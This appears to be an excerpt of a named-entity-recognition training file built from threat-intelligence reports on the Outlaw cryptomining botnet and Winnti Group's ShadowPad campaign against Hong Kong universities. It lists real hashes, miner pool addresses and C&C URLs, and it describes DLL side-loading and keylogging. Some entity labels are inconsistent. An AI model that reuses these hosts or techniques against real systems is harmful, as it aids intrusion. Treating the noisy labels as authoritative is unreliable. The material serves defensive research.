"spans": {"Organization: Outlaw": [[0, 6]]}, "info": {"id": "aptner_train_001410", "source": "aptner_train"}} {"text": "Legacy system users may use their providers ’ virtual patches .", "spans": {}, "info": {"id": "aptner_train_001411", "source": "aptner_train"}} {"text": "Users are advised to close unused ports , to secure ports and other internet-facing devices that are regularly open for system administrators ’ support .", "spans": {}, "info": {"id": "aptner_train_001412", "source": "aptner_train"}} {"text": "Users can also adopt a multilayered security solution that can protect systems from the gateway to the endpoint , actively blocking malicious URLs by employing filtering , behavioral analysis , and custom sandboxing .", "spans": {}, "info": {"id": "aptner_train_001413", "source": "aptner_train"}} {"text": "Users can consider adopting security solutions that can defend against malicious bot-related activities such as Outlaw ’s through a cross-generational blend of threat defense techniques .", "spans": {"Organization: Outlaw": [[112, 118]]}, "info": {"id": "aptner_train_001414", "source": "aptner_train"}} {"text": "Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints , and protect physical , virtual , and cloud workloads .", "spans": {"System: Trend Micro™ XGen™": [[0, 18]]}, "info": {"id": "aptner_train_001415", "source": "aptner_train"}} {"text": "With technologies that employ web/URL filtering , behavioral analysis , and custom sandboxing , XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities .", "spans": {"System: XGen": [[96, 100]]}, "info": {"id": "aptner_train_001416", "source": "aptner_train"}} {"text": "A multi-layered connected network defense and complete visibility into all network traffic , in addition to next-generation intrusion prevention system ( NGIPS ) , can help organizations stay a step ahead of 
threats that could compromise intangible assets .", "spans": {"System: next-generation intrusion prevention system": [[108, 151]], "System: NGIPS": [[154, 159]]}, "info": {"id": "aptner_train_001417", "source": "aptner_train"}} {"text": "XGen security also powers Trend Micro ’s suite of security solutions : Hybrid Cloud Security and User Protection .", "spans": {"Organization: XGen": [[0, 4]], "Organization: Trend Micro": [[26, 37]]}, "info": {"id": "aptner_train_001418", "source": "aptner_train"}} {"text": "Outlaw : 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa Cryptocurrency miner Trojan.SH.MALXMR.UWEJP .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa": [[9, 73]], "System: Cryptocurrency miner": [[74, 94]], "Malware: Trojan.SH.MALXMR.UWEJP": [[95, 117]]}, "info": {"id": "aptner_train_001419", "source": "aptner_train"}} {"text": "Outlaw : b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d Shellbot Backdoor.SH.SHELLBOT.AA .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d": [[9, 73]], "Malware: Shellbot": [[74, 82]], "Malware: Backdoor.SH.SHELLBOT.AA": [[83, 106]]}, "info": {"id": "aptner_train_001420", "source": "aptner_train"}} {"text": "Outlaw : 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 Tool Trojan.Linux.SSHBRUTE.B .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976": [[9, 73]], "Malware: Trojan.Linux.SSHBRUTE.B": [[79, 102]]}, "info": {"id": "aptner_train_001421", "source": "aptner_train"}} {"text": "Outlaw : fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL32 .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a": [[9, 73]], "System: Cryptocurrency 
miner": [[74, 94]], "Malware: Coinminer.Linux.MALXMR.SMDSL32": [[95, 125]]}, "info": {"id": "aptner_train_001422", "source": "aptner_train"}} {"text": "Outlaw : 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL64 .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79": [[9, 73]], "System: Cryptocurrency miner": [[74, 94]], "Malware: Coinminer.Linux.MALXMR.SMDSL64": [[95, 125]]}, "info": {"id": "aptner_train_001423", "source": "aptner_train"}} {"text": "Outlaw : 159.203.141.208 .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 159.203.141.208": [[9, 24]]}, "info": {"id": "aptner_train_001424", "source": "aptner_train"}} {"text": "Outlaw : 104.236.192.6 .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 104.236.192.6": [[9, 22]]}, "info": {"id": "aptner_train_001425", "source": "aptner_train"}} {"text": "Outlaw : 45.9.148.129:80 Miner pool .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 45.9.148.129:80": [[9, 24]], "System: Miner pool": [[25, 35]]}, "info": {"id": "aptner_train_001426", "source": "aptner_train"}} {"text": "Outlaw : 45.9.148.125:80 Miner pool .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 45.9.148.125:80": [[9, 24]], "System: Miner pool": [[25, 35]]}, "info": {"id": "aptner_train_001427", "source": "aptner_train"}} {"text": "Outlaw : http://www.minpop.com/sk12pack/idents.php Command and control .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: http://www.minpop.com/sk12pack/idents.php": [[9, 50]], "System: Command and control": [[51, 70]]}, "info": {"id": "aptner_train_001428", "source": "aptner_train"}} {"text": "Outlaw : http://www.minpop.com/sk12pack/names.php Command and control .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: http://www.minpop.com/sk12pack/names.php": [[9, 49]], "System: Command and control": [[50, 69]]}, "info": {"id": 
"aptner_train_001429", "source": "aptner_train"}} {"text": "Winnti Group targeting universities in Hong Kong .", "spans": {"Organization: Winnti Group": [[0, 12]]}, "info": {"id": "aptner_train_001430", "source": "aptner_train"}} {"text": "In November 2019 , we discovered a new campaign run by the Winnti Group against two Hong Kong universities .", "spans": {"Organization: Winnti Group": [[59, 71]]}, "info": {"id": "aptner_train_001431", "source": "aptner_train"}} {"text": "We found a new variant of the ShadowPad backdoor , the group ’s flagship backdoor , deployed using a new launcher and embedding numerous modules .", "spans": {"Malware: ShadowPad backdoor": [[30, 48]], "Malware: backdoor": [[73, 81]]}, "info": {"id": "aptner_train_001432", "source": "aptner_train"}} {"text": "The Winnti malware was also found at these universities a few weeks prior to ShadowPad .", "spans": {"Malware: The Winnti malware": [[0, 18]], "Malware: ShadowPad": [[77, 86]]}, "info": {"id": "aptner_train_001433", "source": "aptner_train"}} {"text": "The Winnti Group , active since at least 2012 , is responsible for for high-profile supply-chain attacks against the video game and software industries leading to the distribution of trojanized software ( such as CCleaner , ASUS LiveUpdate and multiple video games ) that is then used to compromise more victims .", "spans": {"Organization: Winnti Group": [[4, 16]], "Malware: trojanized software": [[183, 202]], "System: CCleaner": [[213, 221]], "System: ASUS LiveUpdate": [[224, 239]]}, "info": {"id": "aptner_train_001434", "source": "aptner_train"}} {"text": "It is also known for having compromised various targets in the healthcare and education sectors .", "spans": {}, "info": {"id": "aptner_train_001435", "source": "aptner_train"}} {"text": "ESET researchers recently published a white paper updating our understanding of the arsenal of the Winnti Group , following a blog post documenting a supply-chain attack targeting the videogame industry 
in Asia .", "spans": {"Organization: ESET": [[0, 4]], "Organization: Winnti Group": [[99, 111]]}, "info": {"id": "aptner_train_001436", "source": "aptner_train"}} {"text": "Additionally , we published a blog post on a new backdoor named skip-2.0 that targets Microsoft SQL Server .", "spans": {"Malware: backdoor": [[49, 57]], "Malware: skip-2.0": [[64, 72]], "System: Microsoft SQL Server": [[86, 106]]}, "info": {"id": "aptner_train_001437", "source": "aptner_train"}} {"text": "This article focuses on the technical details of this new ShadowPad variant .", "spans": {"Malware: ShadowPad": [[58, 67]]}, "info": {"id": "aptner_train_001438", "source": "aptner_train"}} {"text": "About the “ Winnti Group ” naming :", "spans": {"Organization: Winnti Group": [[12, 24]]}, "info": {"id": "aptner_train_001439", "source": "aptner_train"}} {"text": "We have chosen to keep the name “ Winnti Group ” since it ’s the name first used to identify it , in 2013 , by Kaspersky .", "spans": {"Organization: Winnti Group": [[34, 46]], "Organization: Kaspersky": [[111, 120]]}, "info": {"id": "aptner_train_001440", "source": "aptner_train"}} {"text": "Since Winnti is also a malware family , we always write “ Winnti Group ” when we refer to the malefactors behind the attacks .", "spans": {"Organization: Winnti": [[6, 12]], "Organization: Winnti Group": [[58, 70]]}, "info": {"id": "aptner_train_001441", "source": "aptner_train"}} {"text": "Since 2013 , it has been demonstrated that Winnti is only one of the many malware families used by the Winnti Group .", "spans": {"Organization: Winnti": [[43, 49]], "Organization: Winnti Group": [[103, 115]]}, "info": {"id": "aptner_train_001442", "source": "aptner_train"}} {"text": "In November 2019 , ESET ’s machine-learning engine , Augur , detected a malicious and unique sample present on multiple computers belonging to two Hong Kong universities where the Winnti malware had already been found at the end of October .", "spans": {"Organization: ESET": 
[[19, 23]], "System: Augur": [[53, 58]], "Organization: Winnti": [[180, 186]]}, "info": {"id": "aptner_train_001443", "source": "aptner_train"}} {"text": "The suspicious sample detected by Augur is actually a new 32-bit ShadowPad launcher .", "spans": {"System: Augur": [[34, 39]], "Malware: ShadowPad": [[65, 74]]}, "info": {"id": "aptner_train_001444", "source": "aptner_train"}} {"text": "Samples from both ShadowPad and Winnti found at these universities contain campaign identifiers and C&C URLs with the names of the universities , which indicates a targeted attack .", "spans": {"Malware: ShadowPad": [[18, 27]], "Organization: Winnti": [[32, 38]], "System: C&C": [[100, 103]]}, "info": {"id": "aptner_train_001445", "source": "aptner_train"}} {"text": "In addition to the two compromised universities , thanks to the C&C URL format used by the attackers we have reasons to think that at least three additional Hong Kong universities may have been compromised using these same ShadowPad and Winnti variants .", "spans": {"System: C&C": [[64, 67]], "Malware: ShadowPad": [[223, 232]], "Organization: Winnti": [[237, 243]]}, "info": {"id": "aptner_train_001446", "source": "aptner_train"}} {"text": "This campaign of the Winnti Group against Hong Kong universities was taking place in the context of Hong Kong facing civic protests that started in June 2019 triggered by an extradition bill .", "spans": {"Organization: Winnti Group": [[21, 33]]}, "info": {"id": "aptner_train_001447", "source": "aptner_train"}} {"text": "Even though the bill was withdrawn in October 2019 , protests continued , demanding full democracy and investigation of the Hong Kong police .", "spans": {}, "info": {"id": "aptner_train_001448", "source": "aptner_train"}} {"text": "These protests gathered hundreds of thousands of people in the streets with large support from students of Hong Kong universities , leading to multiple university campus occupations by the protesters .", "spans": {}, "info": {"id": 
"aptner_train_001449", "source": "aptner_train"}} {"text": "We have contacted the compromised universities and provided the necessary information and assistance to remediate the compromise .", "spans": {}, "info": {"id": "aptner_train_001450", "source": "aptner_train"}} {"text": "Unlike previous ShadowPad variants documented in our white paper on the arsenal of the Winnti Group , this launcher is not obfuscated using VMProtect .", "spans": {"Malware: ShadowPad": [[16, 25]], "Organization: Winnti Group": [[87, 99]], "System: VMProtect": [[140, 149]]}, "info": {"id": "aptner_train_001451", "source": "aptner_train"}} {"text": "Furthermore , the encrypted payload is neither embedded in the overlay nor located in a COM1:NULL.dat alternate data stream .", "spans": {}, "info": {"id": "aptner_train_001452", "source": "aptner_train"}} {"text": "And the usual RC5 encryption with a key derived from the volume ID of the system drive of the victim machine ( as seen in the PortReuse backdoor , skip-2.0 and some ShadowPad variants ) is not present either .", "spans": {"Malware: PortReuse backdoor": [[126, 144]], "Malware: skip-2.0": [[147, 155]], "Malware: ShadowPad": [[165, 174]]}, "info": {"id": "aptner_train_001453", "source": "aptner_train"}} {"text": "In this case , the launcher is much simpler .", "spans": {}, "info": {"id": "aptner_train_001454", "source": "aptner_train"}} {"text": "The launcher is a 32-bit DLL named hpqhvsei.dll , which is the name of a legitimate DLL loaded by hpqhvind.exe .", "spans": {"System: DLL": [[25, 28], [84, 87]], "Indicator: hpqhvsei.dll": [[35, 47]], "Indicator: hpqhvind.exe": [[98, 110]]}, "info": {"id": "aptner_train_001455", "source": "aptner_train"}} {"text": "This executable is from HP and is usually installed with their printing and scanning software called “ HP Digital Imaging ” .", "spans": {"Organization: HP": [[24, 26]], "System: HP Digital Imaging": [[103, 121]]}, "info": {"id": "aptner_train_001456", "source": "aptner_train"}} 
{"text": "In this case the legitimate hpqhvind.exe was dropped by the attackers , along with their malicious hpqhvsei.dll , in C:\\Windows\\Temp .", "spans": {"Indicator: hpqhvind.exe": [[28, 40]], "Indicator: hpqhvsei.dll": [[99, 111]]}, "info": {"id": "aptner_train_001457", "source": "aptner_train"}} {"text": "Although we do not have the component that dropped and executed this launcher , the presence of these files leads us to think that the initial execution of this launcher is done through DLL side-l .", "spans": {"System: DLL": [[186, 189]], "System: side-l": [[190, 196]]}, "info": {"id": "aptner_train_001458", "source": "aptner_train"}} {"text": "When the malicious DLL is loaded at hpqhvind.exe startup , its DLLMain function is called that will check its parent process for the following sequence of bytes at offset 0x10BA .", "spans": {"System: DLL": [[19, 22]], "Indicator: hpqhvind.exe": [[36, 48]]}, "info": {"id": "aptner_train_001459", "source": "aptner_train"}} {"text": "In the case where the parent process is hpqhvind.exe , this sequence of bytes is present at this exact location and the malicious DLL will proceed to patch the parent process in memory .", "spans": {"Indicator: hpqhvind.exe": [[40, 52]], "System: DLL": [[130, 133]]}, "info": {"id": "aptner_train_001460", "source": "aptner_train"}} {"text": "It replaces the original instructions at 0x10BA with an unconditional jump ( jmp – 0xE9 ) to the address of the function from hpqhvsei.dll that decrypts and executes the encrypted payload embedded in the launcher .", "spans": {"Indicator: hpqhvsei.dll": [[126, 138]]}, "info": {"id": "aptner_train_001461", "source": "aptner_train"}} {"text": "The decompiled function responsible for patching the parent process .", "spans": {}, "info": {"id": "aptner_train_001462", "source": "aptner_train"}} {"text": "In case hpqhvsei.dll is loaded by a different process than hpqhvind.exe , the malicious code will not be decrypted and executed .", "spans": {"Indicator: 
hpqhvsei.dll": [[8, 20]], "Indicator: hpqhvind.exe": [[59, 71]]}, "info": {"id": "aptner_train_001463", "source": "aptner_train"}} {"text": "The difference between the original and patched hpqhvind.exe .", "spans": {"Indicator: hpqhvind.exe": [[48, 60]]}, "info": {"id": "aptner_train_001464", "source": "aptner_train"}} {"text": "The part of the code that is patched is located at the very beginning of the main function of hpqhvind.exe .", "spans": {"Indicator: hpqhvind.exe": [[94, 106]]}, "info": {"id": "aptner_train_001465", "source": "aptner_train"}} {"text": "The patched code is located right after the load of hpqhvsei.dll .", "spans": {"Indicator: hpqhvsei.dll": [[52, 64]]}, "info": {"id": "aptner_train_001466", "source": "aptner_train"}} {"text": "This means that the function responsible for decrypting and executing the payload is executed directly after the load of the malicious DLL .", "spans": {"System: DLL": [[135, 138]]}, "info": {"id": "aptner_train_001467", "source": "aptner_train"}} {"text": "The encrypted payload is located in the .rdata section of hpqhvsei.dll and the decryption algorithm is an XOR loop where the XOR key is updated at each iteration .", "spans": {"Indicator: hpqhvsei.dll": [[58, 70]]}, "info": {"id": "aptner_train_001468", "source": "aptner_train"}} {"text": "The decrypted payload is the usual shellcode responsible for ShadowPad initialization ( obfuscated using fake conditional jumps to hinder disassembly ) .", "spans": {"System: shellcode": [[35, 44]], "Malware: ShadowPad": [[61, 70]]}, "info": {"id": "aptner_train_001469", "source": "aptner_train"}} {"text": "After having been decrypted , ShadowPad ’s shellcode is executed .", "spans": {"Malware: ShadowPad": [[30, 39]], "System: shellcode": [[43, 52]]}, "info": {"id": "aptner_train_001470", "source": "aptner_train"}} {"text": "It will first achieve persistence on the system by writing the in-memory patched parent process to disk to a path specified in the configuration string pool 
.", "spans": {}, "info": {"id": "aptner_train_001471", "source": "aptner_train"}} {"text": "In the case we examined , the path was C:\\ProgramData\\DRM\\CLR\\CLR.exe .", "spans": {"Indicator: C:\\ProgramData\\DRM\\CLR\\CLR.exe": [[39, 69]]}, "info": {"id": "aptner_train_001472", "source": "aptner_train"}} {"text": "It then creates a service named clr_optimization_v4.0.30229_32 , which is responsible for executing CLR.exe .", "spans": {"Indicator: CLR.exe": [[100, 107]]}, "info": {"id": "aptner_train_001473", "source": "aptner_train"}} {"text": "To avoid suspicion , this service name , as well as the executable name , were chosen to look similar to the name of a Microsoft .NET optimiza Service .", "spans": {"System: Microsoft .NET": [[119, 133]], "Organization: optimiza": [[134, 142]]}, "info": {"id": "aptner_train_001474", "source": "aptner_train"}} {"text": "The numbering on each arrow corresponds to the chronological sequence of events .", "spans": {}, "info": {"id": "aptner_train_001475", "source": "aptner_train"}} {"text": "ShadowPad is a multimodular backdoor where the modules are referenced from the Root module with a circular list from which one can extract the module address , a UNIX timestamp ( probably embedded automatically during the module ’s compilation process ) and a module identifier .", "spans": {"Malware: ShadowPad": [[0, 9]], "Malware: backdoor": [[28, 36]], "System: UNIX": [[162, 166]]}, "info": {"id": "aptner_train_001476", "source": "aptner_train"}} {"text": "From the module itself we can also extract the name the developer gave to the module .", "spans": {}, "info": {"id": "aptner_train_001477", "source": "aptner_train"}} {"text": "This version embeds the 17 modules listed in the following table :", "spans": {}, "info": {"id": "aptner_train_001478", "source": "aptner_train"}} {"text": "100 Root Thu 24 Oct 2019 12:08:27 PM UTC Initial shellcode . 101 Plugins Thu 24 Oct 2019 12:07:02 PM UTC Provides API for the other modules ; loads modules . 
102 Config Thu 24 Oct 2019 12:07:09 PM UTC Handles encrypted configuration string pool . 103 Install Thu 24 Oct 2019 12:07:46 PM UTC Achieves persistence . 104 Online Thu 24 Oct 2019 12:07:17 PM UTC Overall communications with the C&C server . 106 ImpUser Thu 24 Oct 2019 12:07:24 PM UTC User impersonation via token duplication . 200 TCP Thu 24 Oct 2019 12:01:01 PM UTC TCP communications . 202 HTTPS Thu 24 Oct 2019 12:01:15 PM UTC HTTPS communications . 207 Pipe Thu 24 Oct 2019 12:01:35 PM UTC Handles named pipes . 300 Disk Thu 24 Oct 2019 12:02:29 PM UTC File system operations . 301 Process Thu 24 Oct 2019 12:02:36 PM UTC Process handling . 302 Servcie Thu 24 Oct 2019 12:02:45 PM UTC Service handling . 303 Register Thu 24 Oct 2019 12:02:52 PM UTC Registry operations . 304 Shell Thu 24 Oct 2019 12:03:00 PM UTC Command line operations . 306 Keylogger Thu 24 Oct 2019 12:03:16 PM UTC Keylogging to file system . 307 Screen Thu 24 Oct 2019 12:03:25 PM UTC Screenshot capture . 317 RecentFiles Thu 24 Oct 2019 12:04:44 PM UTC Lists recently accessed files .", "spans": {"Indicator: Handles encrypted configuration string pool": [[201, 244]], "System: C&C": [[389, 392]]}, "info": {"id": "aptner_train_001479", "source": "aptner_train"}} {"text": "These modules , except for RecentFiles , have already been mentioned by Kaspersky and Avast .", "spans": {"Organization: Kaspersky": [[72, 81]], "Organization: Avast": [[86, 91]]}, "info": {"id": "aptner_train_001480", "source": "aptner_train"}} {"text": "Notice the “ Servcie ” typo .", "spans": {}, "info": {"id": "aptner_train_001481", "source": "aptner_train"}} {"text": "As usual , all the module timestamps are spread over a short time range , which could suggest the use of a build framework to compile these modules .", "spans": {}, "info": {"id": "aptner_train_001482", "source": "aptner_train"}} {"text": "This also suggests that these modules were built a few hours before the launcher itself , whose compilation timestamp is Thu Oct 
24 14:10:32 2019 .", "spans": {}, "info": {"id": "aptner_train_001483", "source": "aptner_train"}} {"text": "Since this compilation timestamp dates back two weeks before this campaign , it ’s likely that it has n’t been tampered with by the attackers .", "spans": {}, "info": {"id": "aptner_train_001484", "source": "aptner_train"}} {"text": "One might also note that the number of modules embedded in this variant is much higher ( 17 ) than the number of modules embedded in the variants previously documented in our white paper ( 8 to 10 modules ) .", "spans": {}, "info": {"id": "aptner_train_001485", "source": "aptner_train"}} {"text": "By default , every keystroke is recorded using the Keylogger module ( 306, previously documented by Avast ) and saved to disk in the file %APPDATA%\\PAGM\\OEY\\XWWEYG\\WAOUE .", "spans": {"Organization: Avast": [[100, 105]], "Indicator: %APPDATA%\\PAGM\\OEY\\XWWEYG\\WAOUE": [[138, 169]]}, "info": {"id": "aptner_train_001486", "source": "aptner_train"}} {"text": "The log file is encrypted using the same algorithm as the one used to encrypt static strings from the module .", "spans": {}, "info": {"id": "aptner_train_001487", "source": "aptner_train"}} {"text": "Using this module by default indicates that the attackers are interested in stealing information from the victims ’ machines .", "spans": {}, "info": {"id": "aptner_train_001488", "source": "aptner_train"}} {"text": "In contrast , the variants we described in our white paper did n’t even have that module embedded .", "spans": {}, "info": {"id": "aptner_train_001489", "source": "aptner_train"}} {"text": "As with previous ShadowPad variants , the Config module ( 102 ) contains an encrypted string pool that can be accessed from any other module .", "spans": {"Malware: ShadowPad": [[17, 26]]}, "info": {"id": "aptner_train_001490", "source": "aptner_train"}} {"text": "The string pool is never stored entirely decrypted in memory ; the field of interest is decrypted when needed and then 
immediately freed ( thus quickly unavailable ) .", "spans": {}, "info": {"id": "aptner_train_001491", "source": "aptner_train"}} {"text": "The configuration size is 2180 bytes and the encrypted strings are located at offset 0x84 .", "spans": {}, "info": {"id": "aptner_train_001492", "source": "aptner_train"}} {"text": "The algorithm used to decrypt the strings is the same as the one used to decrypt the static strings of the module .", "spans": {}, "info": {"id": "aptner_train_001493", "source": "aptner_train"}} {"text": "The campaign ID is located at offset 0x99 and is the name of the targeted university .", "spans": {}, "info": {"id": "aptner_train_001494", "source": "aptner_train"}} {"text": "Having a campaign ID related to the target is quite common in the case of ShadowPad and Winnti .", "spans": {"Malware: ShadowPad": [[74, 83]], "Organization: Winnti": [[88, 94]]}, "info": {"id": "aptner_train_001495", "source": "aptner_train"}} {"text": "Interestingly , the timestamp present in this config at offset 0x84 is later than the modules ’ timestamps and the loader compilation timestamp .", "spans": {}, "info": {"id": "aptner_train_001496", "source": "aptner_train"}} {"text": "This suggests that this config is added manually to the sample after having been built .", "spans": {}, "info": {"id": "aptner_train_001497", "source": "aptner_train"}} {"text": "Even though it ’s probably coincidental , the date within the config corresponds to the date of the first detection of this sample at the corresponding university .", "spans": {}, "info": {"id": "aptner_train_001498", "source": "aptner_train"}} {"text": "Once installed on the system , ShadowPad starts a hidden and suspended Microsoft Windows Media Player wmplayer.exe process and injects itself into that process .", "spans": {"Malware: ShadowPad": [[31, 40]], "System: Microsoft Windows Media Player": [[71, 101]], "Indicator: wmplayer.exe": [[102, 114]]}, "info": {"id": "aptner_train_001499", "source": "aptner_train"}} 
{"text": "The path to wmplayer.exe is provided by the Config module .", "spans": {"Indicator: wmplayer.exe": [[12, 24]]}, "info": {"id": "aptner_train_001500", "source": "aptner_train"}} {"text": "Once ShadowPad is injected into wmplayer.exe , the Online module will contact the C&C server using the URL specified in the configuration .", "spans": {"Malware: ShadowPad": [[5, 14]], "Indicator: wmplayer.exe": [[32, 44]], "System: C&C": [[82, 85]]}, "info": {"id": "aptner_train_001501", "source": "aptner_train"}} {"text": "The communication is then handled by the TCP module ( 200 ) , which was previously documented by Kaspersky .", "spans": {"Organization: Kaspersky": [[97, 106]]}, "info": {"id": "aptner_train_001502", "source": "aptner_train"}} {"text": "In addition to ShadowPad , the Winnti malware was found on some machines at these two universities at the end of October ( i.e . two weeks before ShadowPad ) in the file C:\\Windows\\System32\\oci.dll and is detected by ESET products as Win64/Winnti.CA .", "spans": {"Malware: ShadowPad": [[15, 24], [146, 155]], "Organization: Winnti": [[31, 37]], "Indicator: C:\\Windows\\System32\\oci.dll": [[170, 197]], "Organization: ESET": [[217, 221]]}, "info": {"id": "aptner_train_001503", "source": "aptner_train"}} {"text": "The Winnti malware usually contains a configuration specifying a campaign ID and a C&C URL .", "spans": {"Organization: Winnti": [[4, 10]], "System: C&C": [[83, 86]]}, "info": {"id": "aptner_train_001504", "source": "aptner_train"}} {"text": "On all machines the campaign ID matches the name of the targeted university and the C&C URLs are :", "spans": {"System: C&C": [[84, 87]]}, "info": {"id": "aptner_train_001505", "source": "aptner_train"}} {"text": "w[redacted].livehost.live : 443 . w[redacted].dnslookup.services : 443 . 
where the redacted part corresponds to the name of the targeted university .", "spans": {"Indicator: w[redacted].livehost.live": [[0, 25]], "Indicator: w[redacted].dnslookup.services": [[34, 64]]}, "info": {"id": "aptner_train_001506", "source": "aptner_train"}} {"text": "One can observe that the C&C URL used by both Winnti and ShadowPad complies to the scheme [backdoor_type][target_name].domain.tld : 443 where [backdoor_type] is a single letter which is either “ w ” in the case of the Winnti malware or “ b ” in the case of ShadowPad .", "spans": {"System: C&C": [[25, 28]], "Organization: Winnti": [[46, 52], [218, 224]], "Malware: ShadowPad": [[57, 66], [257, 266]]}, "info": {"id": "aptner_train_001507", "source": "aptner_train"}} {"text": "From this format , we were able to find several C&C URLs , including three additional Hong Kong universities ’ names .", "spans": {"Indicator: C&C": [[48, 51]]}, "info": {"id": "aptner_train_001508", "source": "aptner_train"}} {"text": "The campaign identifiers found in the samples we ’ve analyzed match the subdomain part of the C&C server , showing that these samples were really targeted against these universities .", "spans": {"System: C&C": [[94, 97]]}, "info": {"id": "aptner_train_001509", "source": "aptner_train"}} {"text": "The Winnti Group is still actively using one of its flagship backdoors , ShadowPad , this time against Hong Kong universities .", "spans": {"Organization: Winnti Group": [[4, 16]], "Malware: backdoors": [[61, 70]], "Malware: ShadowPad": [[73, 82]]}, "info": {"id": "aptner_train_001510", "source": "aptner_train"}} {"text": "In this campaign , the VMProtected launcher used with ShadowPad , as well as with the PortReuse backdoor and skip-2.0 , was replaced by a simpler one .", "spans": {"System: VMProtected": [[23, 34]], "Malware: ShadowPad": [[54, 63]], "Malware: PortReuse backdoor": [[86, 104]], "Malware: skip-2.0": [[109, 117]]}, "info": {"id": "aptner_train_001511", "source": "aptner_train"}} {"text": 
"That these samples , in addition to having been found at these universities , contain campaign IDs matching the universities ’ names and use C&C URLs containing the universities ’ names are good indications that this campaign is highly targeted .", "spans": {"System: C&C": [[141, 144]]}, "info": {"id": "aptner_train_001512", "source": "aptner_train"}} {"text": "We will continue to monitor new activities of the Winnti Group and will publish relevant information on our blog .", "spans": {"Organization: Winnti Group": [[50, 62]]}, "info": {"id": "aptner_train_001513", "source": "aptner_train"}} {"text": "For any inquiries , contact us at threatintel@eset.com .", "spans": {}, "info": {"id": "aptner_train_001514", "source": "aptner_train"}} {"text": "The IoCs are also available in our GitHub repository .", "spans": {"Organization: GitHub": [[35, 41]]}, "info": {"id": "aptner_train_001515", "source": "aptner_train"}} {"text": "ESET detection names : Win32 / Shadowpad.C trojan Win64 / Winnti.CA trojan .", "spans": {"Organization: ESET": [[0, 4]], "System: Win32": [[23, 28]], "Indicator: Shadowpad.C": [[31, 42]], "Malware: trojan": [[43, 49], [68, 74]], "System: Win64": [[50, 55]], "Indicator: Winnti.CA": [[58, 67]]}, "info": {"id": "aptner_train_001516", "source": "aptner_train"}} {"text": "Winnti : hpqhvsei.dll .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: hpqhvsei.dll": [[9, 21]]}, "info": {"id": "aptner_train_001517", "source": "aptner_train"}} {"text": "Winnti : CLR.exe .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: CLR.exe": [[9, 16]]}, "info": {"id": "aptner_train_001518", "source": "aptner_train"}} {"text": "Winnti : hpqhvsei.dll .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: hpqhvsei.dll": [[9, 21]]}, "info": {"id": "aptner_train_001519", "source": "aptner_train"}} {"text": "Winnti : hpqhvind.exe .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: hpqhvind.exe": [[9, 21]]}, "info": {"id": "aptner_train_001520", 
"source": "aptner_train"}} {"text": "Winnti : hpqhvsei.dll .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: hpqhvsei.dll": [[9, 21]]}, "info": {"id": "aptner_train_001521", "source": "aptner_train"}} {"text": "Winnti : oci.dll .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: oci.dll": [[9, 16]]}, "info": {"id": "aptner_train_001522", "source": "aptner_train"}} {"text": "Winnti : C&C : b[org_name].dnslookup.services : 443 .", "spans": {"Organization: Winnti": [[0, 6]], "System: C&C": [[9, 12]], "Indicator: b[org_name].dnslookup.services": [[15, 45]]}, "info": {"id": "aptner_train_001523", "source": "aptner_train"}} {"text": "Winnti : C&C : w[org_name].livehost.live : 443 .", "spans": {"Organization: Winnti": [[0, 6]], "System: C&C": [[9, 12]], "Indicator: w[org_name].livehost.live": [[15, 40]]}, "info": {"id": "aptner_train_001524", "source": "aptner_train"}} {"text": "Winnti : C&C : w[org_name].dnslookup.services : 443 .", "spans": {"Organization: Winnti": [[0, 6]], "System: C&C": [[9, 12]], "Indicator: w[org_name].dnslookup.services": [[15, 45]]}, "info": {"id": "aptner_train_001525", "source": "aptner_train"}} {"text": "Middle Eastern hacking group is using FinFisher malware to conduct international espionage .", "spans": {"Malware: FinFisher": [[38, 47]]}, "info": {"id": "aptner_train_001526", "source": "aptner_train"}} {"text": "Recently , there was a blog post on the takedown of a botnet used by threat actor group known as Group 72 and their involvement in Operation SMN .", "spans": {"Malware: botnet": [[54, 60]], "Organization: Group 72": [[97, 105]]}, "info": {"id": "aptner_train_001527", "source": "aptner_train"}} {"text": "This group is sophisticated , well funded , and exclusively targets high profile organizations with high value intellectual property in the manufacturing , industrial , aerospace , defense , and media sector .", "spans": {}, "info": {"id": "aptner_train_001528", "source": "aptner_train"}} {"text": "The primary 
